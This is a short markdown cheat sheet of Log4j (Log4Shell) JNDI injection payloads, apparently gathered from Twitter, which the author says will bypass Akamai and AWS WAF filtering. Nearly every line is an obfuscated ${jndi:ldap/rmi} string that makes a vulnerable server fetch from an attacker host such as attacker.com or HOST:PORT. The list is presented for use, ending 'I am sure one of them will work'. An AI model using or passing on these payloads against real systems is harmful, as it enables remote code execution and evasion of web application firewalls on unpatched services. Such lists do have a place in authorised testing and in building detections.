# log4j bypass payloads

Note: these are copied from Twitter; I can't mention the authors or researchers individually. All I want to say is thank you very much.

#### Akamai Bypass Log4j

${jndi${123%25ff:-}:ldap://HOST:PORT/a}

#### Amazon AWS WAF Bypass

${j${k8s:k5:-ND}i${sd:k5:-:}ldap://HOST:PORT/a}

${jnd${123%25ff:-${123%25ff:-i:}}ldap://HOST:PORT/a}

### Other bypass payloads

${lower:${:a:d:-${lower:}}jndi:}

${jndi:ldap://attacker.com/a}

${j${upper:${lower:n}}di:ldap://attacker.com/a}

${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://attacker.com/a}

${${env:BARFOO:-j}Ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass}

${${::-j}ndi:rmi://127.0.0.1:1389/ass}

${jndi:rmi://a.b.c}

${${lower:jndi}:${lower:rmi}://q.w.e/poc}

${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc}

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l}

${${::-j}ndi:rmi://}

${${lower:jndi}:${lower:rmi}://}

${${lower:${lower:jndi}}:${lower:rmi}://

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}:}

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}

${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}

${jndi:rmi://adsasd.asdasd.asdasd}

${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

${j${upper:n:-}di:ldap://example.com:1389

${j${k8s:k5:-ND}i${sd:k5:-:}ldap://kjhkjhkjh}

${j${main:\k5:-Nd}i${spring:k5:-:}ldap://kjhkjhkjh}

${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://kjhkjhkjh}

${j${::-nD}i${::-:}ldap://kjhkjhkjh}

${j${EnV:K5:-nD}i:ldap://kjhkjhkjh}

${j${loWer:Nd}i${uPper::}ldap}

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:l}dap${env:NaN:-:}//your.burpcollaborator.net/a}

${${upper:}jndi:ldap://example.com/a}

${j${upper::-n}di:ldap://example.com:1389/a}

${"£$_"£:a:d:-${lower:j}n}di:

${:a:d:-${lower:}j}ndi:

${:a:d:-${lower:j}n}di:

I am sure one of them will work.
[My twitter](https://twitter.com/Chirag99Artani)
Thank You!